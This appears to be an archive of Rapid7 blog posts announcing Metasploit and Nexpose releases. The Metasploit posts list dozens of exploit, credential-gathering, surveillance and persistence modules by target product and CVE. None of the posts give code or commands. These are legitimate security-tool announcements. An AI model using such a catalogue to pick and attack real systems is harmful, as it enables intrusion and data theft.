CVE-2013-0109Windows Command Shell Upgrade (Powershell) by Ben CampbellHP Data Protector Backup Client Service Remote Code Execution by juan vazquez and Aniway.Anyway exploits ZDI-14-008HP Data Protector Backup Client Service Directory Traversal by juan vazquez and Brian Gorenc exploits ZDI-14-003SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write by Brendan Coles and Mohamed Shetta exploits OSVDB-103671ABB MicroSCADA wserver.exe Remote Code Execution by juan vazquez and Brian Gorenc exploits ZDI-13-270GE Proficy CIMPLICITY gefebt.exe Remote Code Execution by juan vazquez, Z0mb1E, and amisto0x07 exploits ZDI-14-015Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow by juan vazquez and RedsadicYokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow by juan vazquez and RedsadicAuxiliary and post modulesRed Hat CloudForms Management Engine 5.1 miq_policy/explorer SQL Injection by Ramon de C Valle exploits CVE-2013-2050Linksys WRT120N tmUnblock Stack Buffer Overflow by Craig Heffner and Michael Messner exploits OSVDB-103521ZyXEL GS1510-16 Password Extractor by Daniel Manser and Sven VetschSerComm Device Configuration Dump by Eloi Vanderbeken and Matt "hostess" Andreko exploits OSVDB-101653Apache Commons FileUpload and Apache Tomcat DoS by Unknown and ribeirux exploits CVE-2014-0050Gzip Memory Bomb Denial Of Service by joev and infoRuby on Rails Action View MIME Memory Exhaustion by joev, sinn3r, and Toby Hsieh exploits CVE-2013-6414Ruby on Rails JSON Processor Floating Point Heap Overflow DoS by joev, todb, and Charlie Somerville exploits CVE-2013-4164IBM Lotus Sametime WebPlayer DoS by Chris John Riley and kicks4kittens exploits CVE-2013-3986Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer Overflow by juan vazquez and RedsadicDNS Non-Recursive Record Scraper by Brandon McCann "zeknox" and Rob Dixon "304geek"DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials by Brendan ColesDrupal OpenID External Entity Injection by juan vazquez and Reginaldo Silva exploits CVE-2012-4554IBM Lotus Notes Sametime User Enumeration by kicks4kittensIBM Lotus Notes Sametime Room Name Bruteforce by kicks4kittensIBM Lotus Sametime Version Enumeration by kicks4kittensJoomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read by Brandon PerryMantisBT Admin SQL Injection Arbitrary File Read by Brandon Perry and Jakub Galczyk exploits CVE-2014-2238vBulletin Password Collector via nodeid SQL Injection by sinn3r, juan vazquez, and Orestis Kourides exploits CVE-2013-3522Chargen Probe Utility by Matteo Cantoni exploits CVE-1999-0103A10 Networks AX Loadbalancer Directory Traversal by xistence exploits OSVDB-102657Cisco ASA ASDM Bruteforce Login Utility by Jonathan ClaudiusOpenMind Message-OS Portal Login Brute Force Utility by Karn GaneshenOracle ILO Manager Login Brute Force Utility by Karn GaneshenManageEngine Support Center Plus Directory Traversal by xistence exploits OSVDB-102656Typo3 Login Bruteforcer by Christian MehlmauerWordpress Scanner by Christian MehlmauerPoison Ivy Command and Control Scanner by SeawolfRNSerComm Network Device Backdoor Detection by Eloi Vanderbeken and Matt "hostess" Andreko exploits OSVDB-101653Printer File Download Scanner by wvu, sinn3r, MC, Matteo Cantoni, and Myo SoePrinter Environment Variables Scanner by wvu, sinn3r, MC, Matteo Cantoni, and Myo SoePrinter Directory Listing Scanner by wvu, sinn3r, MC, Matteo Cantoni, and Myo SoePrinter Volume Listing Scanner by wvu, sinn3r, MC, Matteo Cantoni, and Myo SoePrinter Ready Message Scanner by wvu, sinn3r, MC, Matteo Cantoni, and Myo SoePrinter Version Information Scanner by wvu, sinn3r, MC, Matteo Cantoni, and Myo SoeMS08-067 Scanner by wvu, hdm, Brett Moore, frank2, jduck, and sho-luv exploits CVE-2008-4250Firefox XSS by joevMulti Gather Malware Verifier by sinn3rMulti Manage YouTube Broadcast by sinn3rOSX Screen Capture by Peter TothOSX Gather Autologin Password as Root by joevOSX Gather Safari LastSession.plist by sinn3rOSX Network Share Mounter by joev and Peter TothOSX VPN Manager by Peter TothWindows Gather SmarterMail Password Extraction by sinn3r, Brendan Coles, and Joe GironWindows Gather Active Directory Service Principal Names by Ben Campbell and Scott SutherlandWindows Gather Active Directory User Comments by Ben CampbellWindows Gather Skype, Firefox, and Chrome Artifacts by Joshua HarperWindows Enumerate LSA Secrets by Rob BathurstWindows Manage Driver Loader by Borja MerinoWindows Manage Proxy PAC File by Borja MerinoPlease also note the release notes from this release versus the last weekly update.Get your free Metasploit download or trial on the Rapid7 website now!

Simplify Vulnerability Management with Nexpose 5.6

We are pleased to announce the next major release of Nexpose, version 5.6.  This release focuses on providing you the most impactful remediation steps to reduce risk to your organization and extends our current configuration assessment functionality.New Look and FeelThe most visible…

We are pleased to announce the next major release of Nexpose, version 5.6.  This release focuses on providing you the most impactful remediation steps to reduce risk to your organization and extends our current configuration assessment functionality.New Look and FeelThe most visible change in Nexpose 5.6 is the new look and feel of the user interface.  The action header is now smaller to maximize screen space and usability, and the new colour scheme makes it easier to focus on important areas of the application.Simplifying Remediation PrioritizationSecurity Teams are often inundated with thousands of vulnerabilities across all their assets through their entire network. One of the major challenges facing Security teams is the difficulty in translating known vulnerabilities (the "What") discovered on their network into remediation steps (the "How"). With all of vulnerabilities on the network, security teams struggle with determining which vulnerabilities on their network are the most important to fix and what they need to do to remediate. There are many different ways that this can be tackled. Organizations can go from the top down the vulnerability list based on security risk using a metric like CVSS, focus on their business critical systems first, or throw darts at a wall. In all cases, security teams are focusing on fixing each vulnerability individually on the list of assets they care about. When you are getting into the thousands of vulnerabilities, with more coming every day, it becomes almost impossible for security teams to act as they spend all their time worrying about fires and the next big thing.The other main problem facing security teams is that they often are not the teams performing the actual remediation. Usually they work with the IT Team to apply a patch, upgrade a new version of the vulnerable software on the affected asset, or perform another mitigation technique. The problem is that security and IT teams often speak a different language that is often incompatible with each other. As an example, the security administrator managing the vulnerability management program in an organization might notice that there is a serious vulnerability on a specific asset. After determining whether or not the vulnerability was valid (it was!) and determining which IT administrator was responsible for that asset, the security administrator is now responsible for telling the IT admin to patch that host. Simple enough. The security admin will just tell IT guy, or create a ticket, to state that they need to patch the critical vulnerability CVE-2013-1234 on the asset. They'll probably include the fact that it has a CVSS score of 10.0 and that it's highly critical. All important things to the security admin, but completely useless information to the IT admin. The IT guy is now forced to figure out what all the security mumbo-jumbo means and translate it into something they can understand.Making it easy for IT Teams to take action on vulnerabilities is only the first step. With thousands of vulnerabilities to manage, going through them one by one does not scale, and providing a thousand page report with all the information within it makes matters worse..  For every vulnerability on your network that you solve, even more come in on a day to day basis. It is imperative that security teams have a system that allows them to prioritize fixing the right risks that affect their organization.Not all of the thousands of vulnerabilities that affect a specific organization have different remediation steps. With vulnerability supersedence and product updates, often times multiple vulnerabilities can be fixed by performing one step. If an asset has twenty vulnerabilities on it when scanned with Nexpose, but all of them are associated with Adobe Flash, then the solution for all twenty vulnerabilities would be to upgrade the version of Adobe Flash on that host. It is a simple solution that solves the problem for the security admin, presents the information in a way that the IT admin understands ("Patch Flash on Host") and moves teams away from thinking about vulnerabilities being the default metric in how you look at data.It is a powerful way of thinking about managing your vulnerability program. Instead of focusing on vulnerabilities one-by-one, you can ask the question, "What is the one thing I can do that will minimize my security risk the most and how much will it lower it by?"Nexpose 5.6 includes two new reports that assist you in making your life easier. The first report is a high-level summary that allows you to see, in a prioritized view, the top 'n' remediation actions that will reduce your level of risk. The report will also provide guidance on how your overall security profile for your organization will improve by applying these remediation steps. These include, as percentages, the following metrics.Overall Vulnerability Risk (% Reduced)Number of Assets RemediatedNumber of Vulnerabilities with Known Exploits Remediated (% Reduced)Number of Vulnerabilities associated with Known Malware Kits Remediated (% Reduced)Like any other report in Nexpose, you can restrict the data in the report to specific Sites, Asset Groups, or vulnerability categories for further configurability and granularity. For example, if you have a Dynamic Asset Group that is configured to only include Windows Assets, you can create a remediation report that only list the prioritized remediations for the Windows assets in your environment. This allows you to tailor actionable reports to different IT groups within your organization in a language they understand.Configuration Compliance EnhancementsNexpose 5.6 also adds new content within the Policy Manager around configuration assessment  The latest version of Nexpose includes new certified Center for Internet Security (CIS) Benchmarks for the Red Hat Enterprise Linux 4, 5, and 6 operating systems.We are extending the ability, introduced with the release of Windows CIS Policy content in Nexpose 5.5, for organizations to determine their overall level of compliance to common best practices developed by CIS. This is a big deal for organizations who need to measure their level of compliance against known best standards on Red Hat Enterprise Linux hosts.Determining the overall level of compliance can be a difficult problem to solve for a lot of organizations. They either have to perform the assessment by hand across all of their assets, or use multiple toolsets to pull out this data. Nexpose is flexible to the needs of organizations by allowing users to scan for both Vulnerabilities and Configuration Issues within a unified assessment toolset, allowing users to minimize the amount of scan configuration and time required to get both vulnerability, application and configuration result data in a low touch manner. Users can select any selection of Policies, either old or new, into any scan template.In addition, if your organization has decided that the included CIS Red Hat Enterprise Linux benchmarks within the product are great baseline but do not necessarily meet the needs of you organization, you can use our Policy Editor to make modifications to copies of the included policies within Nexpose. You can then include these custom policies in any scan template for inclusion within a scan.These features are designed to simplify the overall experience for our customers. We want you to make informed and intelligent decisions on what you should do next, freeing up time for you to act, rather than trying to spend time trying to mine through vulnerability and compliance data or dealing with IT. We know that focusing on a remediation view allows you to build a rapport with the IT teams, maximize risk savings while minimizing work effort, and overall simplify and strengthen the security posture of your organization.For more information on Nexpose 5.6, you can look at the release notes here.

Metasploit Pro 4.6 Adds OWASP Top 10 2013 and Security Auditing Wizards

Today, we released Metasploit Pro 4.6, which brings you some awesome new features for your enterprise security program. Updated Web Application Security Testing with Support for OWASP Top 10 2013 Web applications are gaining more and more traction, both through internally developed applications and…

Today, we released Metasploit Pro 4.6, which brings you some awesome new features for your enterprise security program. Updated Web Application Security Testing with Support for OWASP Top 10 2013 Web applications are gaining more and more traction, both through internally developed applications and by adding SaaS-based solutions. These applications often contain some of the most confidential information in the organization, such as financial and customer data, credit card numbers, medical data, and intellectual property. To enable you to audit the security of these applications, Metasploit Pro's web application auditing functionality has been significantly enhanced in the new release: Support for OWASP Top 10 2013: Release 4.6 broadens the scope of Metasploit's security auditing with the inclusion of testing capabilities for the upcoming Open Web Application Security Project (OWASP) Top 10 2013, which is currently in the Release Candidate stage. The list identifies ten of the most critical risks relating to web applications. Due to the popularity of, and increasing reliance on, web applications, they are involved in the majority of breaches. Metasploit addresses this, enabling organizations to audit the security of their web-based applications, whether they be out of the box or custom, on-premise or in the cloud. This helps security professionals identify issues before a malicious attacker does. Learn more about what's new in our OWASP Top 10 2013 webcast. Revamped user interface: Metasploit's web application security testing is now easier to use and includes a wizard that walks you through the process. This speeds up the process for seasoned web application penetration testers, and makes it really easy for new users to conduct baseline assessments. More effective website spider: Like Google crawling the web to index pages, Metasploit Pro's spider follows linked pages to map out the entire application. The updated spider is now more efficient and follows harder to find links to ensure comprehensive testing. Get shells using SQL injection: SQL injections are among the top reasons of compromise for web applications, posing a huge risk to confidential data. Most SQL injection attacks give you access to the data in the database; Metasploit Pro's new SQL injection attacks go beyond this, giving penetration testers a session on the machine, which is equivalent to having administrative rights on the machine. This gives the penetration tester not only access to the database but also to other information on the machine, and opens the door to pivot to other machines. Support for web app authentication: Many web applications require log in credentials for access. Metasploit Pro now supports the five most common authentication types. Web app report with remediation advice: Finding vulnerabilities is great, but the goal is to eliminate them. The remediation advice provided in Metasploit's reports should serve as a valuable basis for discussions with internal developers and external SaaS application providers. Security Auditing Wizards Accelerate Engagements, Simplify Baseline Assessments Metasploit Pro 4.6 also introduces the concept of Security Auditing Wizards, which walk the user through the steps of a typical engagement. Seasoned penetration testers will find that the wizards shortcut the first steps of an engagements, making them more productive. For new Metasploit Pro users, the new wizards provide a great way to easily conduct baseline assessments to find low-hanging fruit. Release 4.6 introduces three new wizards: Quick Penetration Testing Wizard: This wizard guides security professionals through a baseline penetration test. Only requiring users to enter an IP range, the wizard discovers assets, fingerprints hosts, determines potential attacks, runs exploits of a certain safety level, and provides a report. The wizard can either serve as a first step for a more in-depth security assessment or for a baseline penetration test to find low-hanging fruit, either as a regular security practice or before a third-party audit to make it more effective. Web Application Testing Wizard: Requiring only a base URL to start, this wizard crawls the web application, finds exploitable vulnerabilities, and creates a report with remediation information. It is a great, quick way to assess the security of an application during regular assessments or as a gate before releasing it to production. Phishing Simulation Wizard: Phishing emails with links or attachments that try to exploit a user's machine are a big threat vector for many organizations, both for spear phishing and for untargeted attacks. Metasploit Pro's social engineering campaigns enable organizations to measure their exposure by sending simulated phishing emails, both to get a general sense of the size of risk and to verify a reduction of risk after conducting security awareness trainings.  Metasploit Pro 4.6 is available for download now All of these improvements in Metasploit Pro 4.6 are in addition to the weekly updates to all Metasploit editions, both free and commercial ones (read todb's awesome post on Metasploit Framework updates). Existing users of Metasploit can update their installation using the in-product update feature (Kali Linux users may see the update in four hours at the latest as the Kali repos synch). If you want to learn more about what's new in OWASP Top 10 2013, reserve a free seat in our OWASP webcast today. For free trial of Metasploit Pro, download the Metasploit installer now.

Metasploit 4.6.0 Released!

We just released Metasploit 4.6.0, so applying this week's update will get you the brand new version. While Chris has a delightful blog post of what all is new in Metasploit Pro, let's take a look at what's exciting and new between Metasploit…

We just released Metasploit 4.6.0, so applying this week's update will get you the brand new version. While Chris has a delightful blog post of what all is new in Metasploit Pro, let's take a look at what's exciting and new between Metasploit 4.5.0 and today's update to 4.6.0.138 new modulesFirst off, the hacker elves have been cranking out a ton of module content since we released 4.5.0 back in December, 2012. Between then and now, we've got 138 new modules. That's 1.1 new modules per day, including those days that other people call "weekends" and "holidays." Of those, we have 80 new exploits, 44 new auxiliary modules, and 12 new post modules.Of course, most of the module commits don't originate with us here at Rapid7. Over this release, we have 86 distinct committers contributing to Metasploit, and only 11 of them are employed here at Rapid7. It's this overwhelming strength of the Metasploit exploit development community that keeps me super-excited to do Good Work every day. Seriously, thank you all for that. I'm getting all verklempt here.A stroll down diff laneOf course, we did a little more than just sling exploit code for 4.6.0. We also moved the ball forward on a whole bunch of core development and security research. Here are the highlights:We got serious about unit testing. Exploit writers are notorious for writing quick, throw-away code, born of the race to get a working PoC together before the next guy (and the next patch!). Since Metasploit Framework is largely written by exploit devs, this habit has been really hard to combat. That said, on the road to 4.6.0, we integrated Travis-CI to run our growing library of RSpec tests. We're a long way from done there, of course, but we've made some pretty significant progress.We detailed our peer code review practices for landing new code and new modules. Open source security development means taking risks, leaving your comfort zone, and suffering the slings and arrows of code review. Believe me, it's a lot easier to just pile on hack after hack when you're sitting in your closed-source cubicle farm, but developing in public means that we get to review and critique code from all comers. In the end, we hope we're being helpful, and fewer mistakes are repeated for next time.We ported a bunch of 0day for Metasploit users. This kind of fast turnaround immediately puts the tools to test and validate remediation directly in the hands of the people who are best positioned to help: you. In addition, Metasploit exploits are now making it into other projects' regression testing cases, and are used to teach the next wave of security researchers how to quickly turn a found-in-the-wild 0day into a useful, safe, and effective exploit module.We implemented a pretty novel new Postgres payload delivery system -- just in time for the recent wave of Postgres vulnerabilities! Nothing proves a vulnerability better than popping shells.We invented a portable Ruby command exec payload to take advantage of the wave of Rails vulnerabilities announced these last couple months. While getting a rails server to print "hello world!" on the console is all well and good, it's really all about the shells.We updated msfupdate to fully take advantage of our Git-based source code control systems, as well as to use the Metasploit Community and Pro edition update systems. We recognize that most Metasploit users really just want stability and security in their updates, and tracking along a source code tree isn't usually the way to get there. So, now installed versions of Metasploit (including Kali-installed Debian packages) will only update once a week, after the usual in-house QA and validation.We turned exploited endpoints into Hollywood-hacker spy systems. Thanks to a user bug, we found that the record_mic feature of Meterpreter had been broken for a little while. So, we fixed it, wrapped it up in a post module, added a webcam activation module and some CCTV controller, and unleashed these A/V-centric modules into the world. I have no idea if real espionage agents actually do this kind of thing or not, but now you can prove that they can on your next pentest engagement. After all, that's kind of the point of a penetration test -- you want to be able to simulate what a real adversary could do in order to bring attention to the real risk of vulnerabilities.We put together some UPnP modules to help people scan their enterprises for misconfigured and buggy UPnP endpoints. You are blocking and watching UDP port 1900 by now, right?We asked you nicely to msftidy.rb your modules as part of a Git pre-commit hook. Since we started automating msftidy, the module quality we've been seeing shot up considerably, and we've been able to move new modules through the pull request queue a lot faster with a lot fewer common mistakes. Of course, as a result, we now get more pull requests. I'm sure there's an economics lesson about friction in there somewhere.We started using a new heap spray technique for our many browser-based exploits. This was on the heels of some very excellent training and collaboration with the Corelan Team. Now, with a little luck, we can write more reliable exploits all the way through Internet Explorer 10, as well as Firefox 54 (or whatever their latest version is by the time this post goes live).We now support Kali as an installation target. This was a huge accomplishment, thanks to the teamwork between Rapid7 and Offensive Security, getting a stable, supportable build into the hands of Kali Linux users worldwide. Assuming this ends up working out as we expect, we should be able to start supporting other platforms, such as Ubuntu, Debian, and Mint, with proper Debian packages. (We're also experimenting with a for-real Homebrew tap for you Mac OSX guys, but shhh it's not official yet.)We pushed the envelope on WAP/Router hacking by landing a metric ton of exploit and auxilary modules targeting Linksys, D-Link, and Netgear devices, as well as putting together command execution payloads custom built for MIPS computing environments.So, yeah. Been a busy four months or so. All of those bullets start with the word "we," and like I said, that's not just Rapid7 folks; it's all of you who pitched in with your work, patience, smarts, and gumption to get this thing out the door. Thanks!Module roundupIf you're upgrading from 4.5.0 to 4.6.0, here's the laundry list of security testing goodness you have to look forward to. Let's be careful out there!OpenPLI Webif Arbitrary Command Execution by Michael Messner exploits OSVDB-90230HP System Management Anonymous Access Code Execution by agix exploits OSVDB-91812Linksys E1500/E2500 apply.cgi Remote Command Injection by juan vazquez and Michael Messner exploits OSVDB-89912Netgear DGN1000B setup.cgi Remote Command Execution by juan vazquez and Michael Messner exploits OSVDB-89985MongoDB nativeHelper.apply Remote Code Execution by agix exploits CVE-2013-1892Novell eDirectory 8 Buffer Overflow by juan vazquez, David Klein, and Gary Nilson exploits CVE-2012-0432PostgreSQL for Linux Payload Execution by egyp7, todb, and midnitesnakeJava Applet AverageRangeStatisticImpl Remote Code Execution by juan vazquez and Unknown exploits CVE-2012-5076Java Applet JMX Remote Code Execution by sinn3r, juan vazquez, egyp7, and Unknown exploits CVE-2013-0422Java Applet JMX Remote Code Execution by juan vazquez, Adam Gowdiak, SecurityObscurity, and Unknown exploits CVE-2013-0431Java Applet Method Handle Remote Code Execution by juan vazquez and Unknown exploits CVE-2012-5088eXtplorer v2.1 Arbitrary File Upload Vulnerability by Brendan Coles exploits OSVDB-88751Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability by AkaStep and Brendan ColesJenkins Script-Console Java Execution by Spencer McIntyre and jamcutKordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability by Brendan ColesMovable Type 4.2x, 4.3x Web Upgrade Remote Code Execution by Gary O'Leary-Steele, Kacper Nowak, and Nick Blundell exploits CVE-2013-0209Mutiny Remote Command Execution by juan vazquez and Christopher Campbell exploits CVE-2012-3001Netwin SurgeFTP Remote Command Execution by sinn3r and Spencer McIntyrePolarPearCms PHP File Upload Vulnerability by Fady Mohamed Osman exploits CVE-2013-0803Ruby on Rails JSON Processor YAML Deserialization Code Execution by egyp7, jjarmoc, and lian exploits CVE-2013-0333Ruby on Rails XML Processor YAML Deserialization Code Execution by hdm, charliesome, espes, and lian exploits CVE-2013-0156SonicWALL GMS 6 Arbitrary File Upload by juan vazquez, Julian Vilas, and Nikolas Sotiriu exploits CVE-2013-1359Splunk 5.0 Custom App Remote Code Execution by sinn3r, juan vazquez, and marcwickendenApache Struts ParametersInterceptor Remote Code Execution by Meder Kydyraliev, Richard Hicks, and mihi exploits CVE-2011-3923STUNSHELL Web Shell Remote PHP Code Execution by bwallSTUNSHELL Web Shell Remote Code Execution by bwallv0pCr3w Web Shell Remote Code Execution by bwallNovell ZENworks Configuration Management Remote Execution by juan vazquez and James Burton exploits ZDI-13-049Ra1NX PHP Bot PubCall Authentication Bypass Remote Code Execution by bwall exploits OSVDB-91663Portable UPnP SDK unique_service_name() Remote Code Execution by hdm, Alex Eubanks, and Richard Harman exploits CVE-2012-5958Setuid Tunnelblick Privilege Escalation by juan vazquez and Jason A. Donenfeld exploits CVE-2012-3485Viscosity setuid-set ViscosityHelper Privilege Escalation by juan vazquez and Jason A. Donenfeld exploits CVE-2012-4284DataLife Engine preview.php PHP Code Injection by juan vazquez and EgiX exploits CVE-2013-1412Foswiki MAKETEXT Remote Command Execution by juan vazquez and Brian Carlson exploits CVE-2012-6329Joomla Component JCE File Upload Remote Code Execution by Heyder Andrade and Unknown exploits BID-49338Nagios3 history.cgi Host Command Execution by Daniele Martini, Jose Selvi, Unknown, and blasty exploits CVE-2012-6096Nagios XI Network Monitor Graph Explorer Component Command Injection by sinn3r and Daniel Compton exploits OSVDB-83552OpenEMR PHP File Upload Vulnerability by juan vazquez and Gjoko Krstic exploits OSVDB-90222PHP-Charts v1.0 PHP Code Execution Vulnerability by AkaStep and Brendan Coles exploits OSVDB-89334TWiki MAKETEXT Remote Command Execution by juan vazquez and George Clark exploits CVE-2012-6329WordPress Plugin Advanced Custom Fields Remote File Inclusion by Charlie Eriksen exploits OSVDB-87353WordPress Asset-Manager PHP File Upload Vulnerability by James Fitts and Sammy FORGIT exploits OSVDB-82653WordPress Plugin Google Document Embedder Arbitrary File Disclosure by Charlie Eriksen exploits CVE-2012-4915WordPress WP-Property PHP File Upload Vulnerability by James Fitts and Sammy FORGIT exploits OSVDB-82656ZoneMinder Video Server packageControl Command Execution by Brendan ColesCrystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow by juan vazquez, Dmitriy Pletnev, and Dr_IDE exploits CVE-2010-2590Foxit Reader Plugin URL Processing Buffer Overflow by juan vazquez, Sven Krewitt, and rgod exploits OSVDB-89030Honeywell HSC Remote Deployer ActiveX Remote Code Execution by juan vazquez exploits CVE-2013-0108Honeywell Tema Remote Installer ActiveX Remote Code Execution by juan vazquez, Billy Rios, and Terry McCorkle exploits OSVDB-76681Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability by sinn3r, juan vazquez, Peter Vreugdenhil, eromang, and mahmud ab rahman exploits MS13-008InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow by juan vazquez, Alexander Gavrun, Dmitriy Pletnev, and James Fitts exploits ZDI-12-168IBM Lotus iNotes dwa85W ActiveX Buffer Overflow by juan vazquez and Gaurav Baruah exploits ZDI-12-132Java CMM Remote Code Execution by juan vazquez and Unknown exploits CVE-2013-1493Maxthon3 about:history XCS Trusted Zone Code Execution by sinn3r, juan vazquez, and Roberto Suggi LiveraniMicrosoft Internet Explorer Option Element Use-After-Free by sinn3r, juan vazquez, and Ivan Fratric exploits MS11-081MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free by Scott Bell exploits MS13-009IBM Lotus Notes Client URL Handler Command Injection by juan vazquez, Moritz Jodeit, and Sean de Regge exploits ZDI-12-154Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution by juan vazquez and rgod exploits ZDI-13-008VMWare OVF Tools Format String Vulnerability by juan vazquez and Jeremy Brown exploits CVE-2012-3569IBM Lotus QuickR qp2 ActiveX Buffer Overflow by juan vazquez and Gaurav Baruah exploits ZDI-12-134Cool PDF Image Stream Buffer Overflow by juan vazquez, Chris Gabriel, and Francis Provencher exploits CVE-2012-4914KingView Log File Parsing Buffer Overflow by juan vazquez, Carlos Mario Penagos Hollman, and Lucas Apa exploits CVE-2012-4711VMWare OVF Tools Format String Vulnerability by juan vazquez and Jeremy Brown exploits CVE-2012-3569RealPlayer RealMedia File Handling Buffer Overflow by suto exploits CVE-2012-5691FreeFloat FTP Server Arbitrary File Upload by sinn3r and juan vazquez exploits OSVDB-88303Sami FTP Server LIST Command Buffer Overflow by Doug Prostko and superkojiman exploits OSVDB-90815HP Intelligent Management Center Arbitrary File Upload by juan vazquez and rgod exploits ZDI-13-050Windows Manage Memory Payload Injection by sinn3r and Carlos PerezWindows Manage Persistent Payload Installer by Carlos PerezWindows Manage User Level Persistent Payload Installer by Brandon McCann "zeknox" and Thomas McCarthy "smilingraccoon"ActFax 5.01 RAW Server Buffer Overflow by juan vazquez, Craig Freyman, and corelanc0d3r exploits OSVDB-89944BigAnt Server DUPF Command Arbitrary File Upload by juan vazquez and Hamburgers Maccoy exploits CVE-2012-6274BigAnt Server 2 SCH And DUPF Buffer Overflow by juan vazquez and Hamburgers Maccoy exploits CVE-2012-6275Enterasys NetSight nssyslogd.exe Buffer Overflow by juan vazquez, Jeremy Brown, and rgod exploits ZDI-11-350Firebird Relational Database CNCT Group Number Buffer Overflow by Spencer McIntyre exploits CVE-2013-2492HP Data Protector DtbClsLogin Buffer Overflow by juan vazquez and AbdulAziz Hariri exploits ZDI-10-174IBM Cognos tm1admsd.exe Overflow by juan vazquez and Unknown exploits ZDI-12-101IBM System Director Agent DLL Injection by juan vazquez, Bernhard Mueller, and kingcope exploits CVE-2009-0880Microsoft SQL Server Database Link Crawling Command Execution by Antti Rantasaari and Scott Sutherland "nullbind"SCADA 3S CoDeSys Gateway Server Directory Traversal by Enrique Sanchez exploits CVE-2012-4705Freesshd Authentication Bypass by Aris, Daniele Martini, and kcope exploits CVE-2012-6066Linux Gather PPTP VPN chap-secrets Credentials by sinn3rLinux Manage Download and Exececute by Joshua D. AbrahamMulti Manage Record Microphone by sinn3rWindows Gather BulletProof FTP Client Saved Password Extraction by juan vazquezRazer Synapse Password Extraction by Brandon McCann "zeknox", Matt Howard "pasv", and Thomas McCarthy "smilingraccoon"Windows Gather Spark IM Password Extraction by Brandon McCann "zeknox" and Thomas McCarthy "smilingraccoon"Steam client session Collector. by Nikolai RusakovWindows Gather AD Enumerate Computers by Ben CampbellWindows Gather Local Admin Search by Brandon McCann "zeknox", Royce Davis "r3dy", and Thomas McCarthy "smilingraccoon"Windows NetLM Downgrade Attack by Brandon McCann "zeknox" and Thomas McCarthy "smilingraccoon"Microsoft Word UNC Path Injector by SphaZWindows Manage Reflective DLL Injection Module by Ben CampbellWindows Manage Webcam by sinn3rAxigen Arbitrary File Read and Delete by juan vazquez and Zhao Liang exploits CVE-2012-4940D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution by Michael Messner exploits OSVDB-89861DLink DIR 645 Password Extractor by Michael Messner and Roberto Paleari exploits OSVDB-90733Linksys E1500/E2500 Remote Command Execution by Michael Messner exploits OSVDB-89912Linksys WRT54GL Remote Command Execution by Michael Messner exploits OSVDB-89421Ruby on Rails Devise Authentication Password Reset by jjarmoc and joernchen exploits CVE-2013-0233PsExec NTDS.dit And SYSTEM Hive Download Utility by Royce DavisMicrosoft Word UNC Path Injector by SphaZDopewars Denial of Service by Doug Prostko exploits CVE-2009-3591OpenSSL TLS 1.1 and 1.2 AES-NI DoS by Wolfgang Ettlinger exploits CVE-2012-2686DNS Brutefoce Enumeration by Carlos PerezDNS Basic Information Enumeration by Carlos PerezDNS Reverse Lookup Enumeration by Carlos PerezDNS Common Service Record Enumeration by Carlos PerezDiscover External IP via Ifconfig.me by RageLtManHTTP SSL Certificate Impersonation by Chris John RileyW3-Total-Cache Wordpress-plugin 0.9.2.4 (or before) Username and Hash Extract by Christian Mehlmauer and Jason A. Donenfeld exploits OSVDB-88744XBMC Web Server Directory Traversal by sinn3r, Lucas "acidgen" Lundgren IOActive, and Matt "hostess" AndrekoTitan FTP XCRC Directory Traversal Information Disclosure by Brandon McCann @zeknox and jduck exploits OSVDB-65533DLink DIR-300A / DIR-320 / DIR-615D HTTP Login Utility by hdm and Michael Messner exploits CVE-1999-0502DLink DIR-615H HTTP Login Utility by hdm and Michael Messner exploits CVE-1999-0502DLink DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility by hdm and Michael Messner exploits CVE-1999-0502Novell Groupwise Agents HTTP Directory Traversal by juan vazquez and r () b13$ exploits CVE-2012-0419Joomla Page Scanner by newpid0Joomla Plugins Scanner by newpid0Joomla Version Scanner by newpid0Linksys E1500 Directory Traversal Vulnerability by Michael Messner exploits OSVDB-89911Netgear SPH200D Directory Traversal Vulnerability by Michael Messner exploits BID-57660Ruby on Rails JSON Processor YAML Deserialization Scanner by hdm and jjarmoc exploits CVE-2013-0333Ruby on Rails XML Processor YAML Deserialization Scanner by hdm and jjarmoc exploits CVE-2013-0156Simple Web Server 2.3-RC1 Directory Traversal by sinn3r and CwG GeNiuS exploits OSVDB-88877SVN wc.db Scanner by Stephen HaywoodSymantec Messaging Gateway 9.5 Log File Download Vulnerability by sinn3r and Ben Williams exploits CVE-2012-4347Titan FTP Administrative Password Disclosure by Spencer McIntyre exploits CVE-2013-1625TP-Link Wireless Lite N Access Point Directory Traversal Vulnerability by Michael Messner exploits CVE-2012-5687Wordpress Pingback Locator by Brandon McCann "zeknox", Christian Mehlmauer "FireFart", and Thomas McCarthy "smilingraccoon"Multiple DVR Manufacturers Configuration Disclosure by juan vazquez and Alejandro Ramos exploits CVE-2013-1391Ray Sharp DVR Password Retriever by hdm and someluserMYSQL File/Directory Enumerator by Robin WoodPostgreSQL Database Name Command Line Flag Injection by hdm exploits CVE-2013-1899MS12-020 Microsoft Remote Desktop Checker by Brandon McCann @zeknox and Royce Davis @R3dy_ exploits MS12-020SAP ICF /sap/public/info Service Sensitive Information Gathering by Agnivesh Sathasivam, ChrisJohnRiley, and nmonkeeSAPRouter Admin Request by Chris John Riley, Ian de Villiers, Joris van de Vis, Mariano Nunez, and nomnkeeICMP Exfiltration Service by Chris John RileyAvailabilityIf you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Weekly Metasploit Update: Browser Autopwn 0-day, ICMP Exfiltration, LM Downgrading, and Reporting Speedups

